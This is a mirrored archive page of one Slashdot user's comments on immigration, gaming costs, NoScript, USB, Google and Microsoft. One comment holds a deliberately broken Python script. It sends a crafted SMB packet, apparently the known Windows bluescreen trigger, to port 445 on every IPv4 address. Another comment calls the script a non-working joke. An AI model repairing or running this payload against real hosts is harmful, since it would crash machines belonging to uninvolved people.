Slashdot Mirror


User: RiotingPacifist

RiotingPacifist's activity in the archive.

Stories
0
Comments
3,164
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 3,164

  1. Re:The problem on Scientists Decry "Horrifying" UK Border Test Plan · · Score: 1

    Why? Only BNP readers and daily mail supporters will tell you the county is "full", something that is blatantly not true! The net effect of immigrates is a huge positive on the economy. All terrorists have been 2nd+ generation, so unless you are going deport people who have lived here all their life, we won't be any safer!

  2. Re:Geek funeral? on A Geek Funeral · · Score: 1

    Not at all I've been in training for years!

  3. Re:Geek funeral? on A Geek Funeral · · Score: 1

    Speak for yourself, I want all my corporal remains* to be donated to medical science, anything that is left should be used as fertiliser. I really don't get the point of this cremation bullshit waste of good nutrients I say!

    *my brain patterns should be backed up to for future reference, I'll take a fully cybernetic body over your crappy hybrid any day!

  4. Re:Porn at work should be encouraged on Porn Surfing Rampant At US Science Foundation · · Score: 2, Funny
  5. Re:DLC on The Nickel & Dime Generation · · Score: 1

    I bought HL2 for PC, it cost ~£30 (DOD:S may have required another ~£30) and ive been playing HL2,DOD:S,dystopia,PVK,etc for 5 years (well on/off) total cost = £30 (numbers may be off)
    In my gaming peak (15-18) i played almost games every night (and im talking 5-6hrs sessions), total cost was £300 for the PC (+£200 for fubaring my farther's), £20 (hl generations)+£20 (bfv) + £40 (BF2) = ~£600 (including hardware) [I'm not sure on converting the digits as game prices don't follow currency or inflation much] which is much less that $837.20 + console (+ second console when 1st one red rings)

    PC gaming is for suckers!

  6. Re:NoScript on Reddit Javascript Exploit Spreading Virally · · Score: 1

    it's hard to see how allowing arbitrary JS to run on your system can be considered 'more secure' than only running it from sites you trust.

    The same way that file permissions can be considered more secure than only allowing trusted people to use your computer. At the end of the day if you want to actually browse the web you need to go outside your safe list of sites, in addition to this there is the fact that even the most trusted of sites/applications will eventually be exploited, so reducing the damage an exploited site/app can do is just common sense!

  7. Re:NoScript on Reddit Javascript Exploit Spreading Virally · · Score: 4, Insightful

    Cue me reposting my views on noscript being a pretty crappy tool for modern web security then.

    NoScript comes from a broken way of thinking, "you can identify attacking sites and trusted sites", the attack code for this was coming from reddit.com (a site you have to allow in order to use reddit). The only way this sort of bug can be protected against is by use of javascript filtering tools such as controldescripts that filter javascript request by type and domain, with such a tool it would be possible to protect yourself much more effectively.

    mouseclick is submitting info -> allow
    mouseover is requesting data -> allow
    mouseover is submitting data -> request user confirmation
    javascript function is doing something weird -> request user confirmation
    javascript is trying to use a known exploit* -> deny and notify user (as a workaround for 0-days simply blocking the bad JS calls will protect users much faster than browsers usually get patched) ...etc

    You could also combine this with domain checking to have lists of pages where you allow
    *no-js (untrusted),
    *simple-JS (google, youtube, etc) but [it might allow functionality but could prevent tracking],
    *complex-js (facebook, etc) [all the ajax stuff means simple-JS wouldn't work]
    *all-JS (fancynewsite.com) [even the complex list of functions you allow just isn't enough]

    Such tools could also help the paranoid among us use website that require JS, by disabling mousetracking and sending of data on non-click actions.

    As long as people stick to the broken thinking of trusted/untrusted domains, there is little chance of this actually happening. The worst thing about noscript is that for an unkown site you often have to allow JS on it to see what it looks like, so unless you plan on only browsing sites you've already been to and those that don't use javascript, it is completely useless yet its users claim, nay genuinely think they are more secure!

  8. Re:TopGear on '09 Malibu Vs. '59 Bel Air Crash Test · · Score: 1

    Yeah i was just providing a link to the moment when they crash, i should probably have clarified that.

  9. yahoo answers on StackOverflow For Any Topic · · Score: 1

    I thought yahoo answers was where you could ask any question and get a well thought out informative response?

  10. Re:TopGear on '09 Malibu Vs. '59 Bel Air Crash Test · · Score: 1

    tl;dw they actually crashed. I'm no car fan but surely even you guys can't be arsed to hear about crash test dummies and specs for 4m before they actually do anything!?

  11. Market on Apple Behind Intel's USB Competitor? · · Score: 4, Interesting

    USB dominates the peripherals market because it allows for cheep peripherals.
    Monitor cables are specialised to not require the monitor to do much work.
    Ethernet cables allow high transfer rates between expensive devices.

    What is the market for this?
    Will it require "expensive" tech on both ends or will the PC be able to do the lifting?

  12. Re:Clearly, you don't have a clue about Socialism on $529M Gov't Loan To Develop $89,000 Hybrid Sports Car · · Score: 1

    Mod parent up, GP is not a troll, he may be wrong (i actually agree with alot of his well sourced points) but P is correct he ain't no troll

  13. Re:US technology on $529M Gov't Loan To Develop $89,000 Hybrid Sports Car · · Score: 1

    I get the impression that while falmebaity you have hit upon 2 truths:
    1) As broken as the US education system is (or is not, tbh i don't know), there is a strong anti-education counter culture in the US
    2) you can never force people to learn.

  14. Re:Typical on $529M Gov't Loan To Develop $89,000 Hybrid Sports Car · · Score: 1

    We tried that, Bush didn't invest much in green tech and it didn't work, now lets try something else!

  15. stop pussy-footing around on Google Barks Back At Microsoft Over Chrome Frame Security · · Score: 1

    Goggle should stop pussy-footing around and add a warning box to thier mainpage that tells a user how many publicly announced unpatched exploits there are for the users browser & os. or "Microsoft press statement" => did you mean lies?

  16. Re:Genuine innovation on CA City Mulls Evading the Law On Red-Light Cameras · · Score: 1

    vista and 7, but close

  17. Re:GPL Violation? on Google Serves a Cease-and-Desist On Android Modder · · Score: 3, Informative

    Did you read the article? It clearly says that its todo with shipping google's closed apps like gmail/gmaps/etc. The OS is free but much of the software is not. Personally it seams pretty dumb to stop people handing out your free apps, but it is definitely within their rights.

  18. Worse is better on The Duct Tape Programmer · · Score: 1

    it is not 1989. we are not academia. oh and get off my lawn!

    Seriously how is this post new, or anything about it new?

  19. Re:It will also "start to boot" Linux in 1 Second! on New Phoenix BIOS Starts Windows 7 Boot In 1 Second · · Score: 1

    1s -> grub
    3s -> Loading kernel / drivers, running init (including loading the libraries that it and its child processes need)
    9s -> start the X server
    once X is started it depends how much crap a user runs in the background but fluxbox can easily start in a second.

    If you add something like user specific readaheads to the global bootup script, you can cut down kde/gnome start time to a few seconds. I'm not saying i believe ubuntu will do it for the next version but it is certainly an achievable goal.

  20. Re:Genuine innovation on CA City Mulls Evading the Law On Red-Light Cameras · · Score: 1

    No but it will* cause what appears to be "Chain crashes of multiple machines" and it allows unprivileged users to bluescreen the PC. I suppose technically the daemon an application and a legitimate error could cause that exploit to be triggered but i do agree it is rather tenuous to call it an application level error.

    *Actually it wont, the code i put together there wont work for shit, as i put it together in about 5 seconds as a joke. Tbh not sure why i got interesting i didn't even indent the code right (not that it matters in python).

  21. Re:Big companies CAN'T change direction on CA City Mulls Evading the Law On Red-Light Cameras · · Score: 1

    How come they are just a marketing company, but they manage to produce a product that actually works with a wireless LAN?

    I take it you have not used wireless on vista, and if you live in europe or japan you can forget about using channels 12,13 & 14. because they are not valid inside the US

  22. Re:Genuine innovation on CA City Mulls Evading the Law On Red-Light Cameras · · Score: 4, Interesting

    Can you provide details on how to replicate this behaviour ?

    Install python
    run:
    #!/usr/bin/python
    from socket import socket
    from time import sleep

    while True:
            for a in 255:
                    for b in 255:
                            for c in 255:
                                    for d in 255:
                                    ip_addr = a+"."+b+"."+c+"."+d
                                    host = id_addr, 445
                                    buff = (
                                    "\x00\x00\x00\x90" # Begin SMB header: Session message
                                    "\xff\x53\x4d\x42" # Server Component: SMB
                                    "\x72\x00\x00\x00" # Negociate Protocol
                                    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
                                    "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
                                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                                    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
                                    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
                                    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
                                    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
                                    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
                                    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
                                    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
                                    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
                                    "\x30\x30\x32\x00"

                                    )
                                    s = socket()

                                    s.connect(host)
                                    s.send(buff)
                                    s.close()

  23. Re:direct CPU-CPU interconnects; Transputer? on CA City Mulls Evading the Law On Red-Light Cameras · · Score: 2, Interesting

    Imagine what might have happened if this actually got momentum behind it and we never went through the stagnation that is DOS/Windows.

    I think i just came a little.

  24. Windows on Microsoft Says Google Chrome Frame Makes IE Less Secure · · Score: 1

    did you mean "Horribly insecure operating system"?

    I'm not saying that google should use thier position as #1 search provided to bitchslap slap microsoft but if i were them:
    active X => did you mean "poorly thought put gaping security hole"?
    fault hardware => did you mean "xbox"?
    how do i get rid of malware? => did you mean "how do i install linux"?

  25. Handwriting support? on Best Tablet PC For Classroom Instruction? · · Score: 2, Interesting

    Can handwriting recognition be used only as an indexing tool? There is no point in changing what you actually see in the handouts.